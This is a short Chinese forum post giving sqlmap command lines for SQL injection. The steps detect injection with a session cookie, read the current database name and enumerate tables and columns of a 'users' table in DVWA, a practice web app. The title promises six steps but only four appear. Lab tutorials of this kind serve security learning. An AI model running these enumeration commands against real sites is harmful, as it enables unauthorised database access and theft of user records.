fablefe 发表于 2018-10-21 09:40:53

SQL MAP 使用-经典6步法

  第一步:
  -u "xxx" --cookie= "yyy" //带上cookie对URL进行注入探测
  第二部:
  -u "xxx" --cookie= "yyy" --current-db //对数据库名进行获取
  第三步:
  -u "xxx" --cookie= "yyy" -D dvwa --table//对数据库dvwa的表名进行枚举
  第四步:
  -u "xxx" --cookie="yyy" -D dvwa -T users --columns //对dvwa库里面的名为users的表的列明进行枚举

页: [1]
查看完整版本: SQL MAP 使用-经典6步法